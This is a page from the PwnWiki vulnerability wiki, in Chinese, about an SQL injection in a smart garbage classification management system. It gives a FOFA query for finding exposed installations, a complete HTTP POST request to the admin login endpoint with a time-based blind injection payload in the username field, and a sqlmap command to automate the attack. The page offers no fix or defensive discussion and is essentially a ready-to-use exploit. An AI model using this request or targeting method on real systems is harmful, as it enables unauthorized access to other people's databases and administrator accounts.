免费、自由、人人可编辑的漏洞库--PwnWiki.com
,
FOFA
title="智能垃圾分类管理系统"
漏洞利用
发送请求包
POST /ghc_master/data/action.admindata.php HTTP/1.1 Host: xxx.xxx.xxx.xxx Content-Length: 96 Accept: */* X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.62 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: http://xxx.xxx.xxx.xxx Referer: http://xxx.xxx.xxx.xxx/ Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6 Connection: close do=adminlogin&username=admin' AND (SELECT 2847 FROM (SELECT(SLEEP(5)))trlL)-- sNmL&password=4224
Sqlmap:
sqlmap -r sql.txt -p username
pwnwiki.com
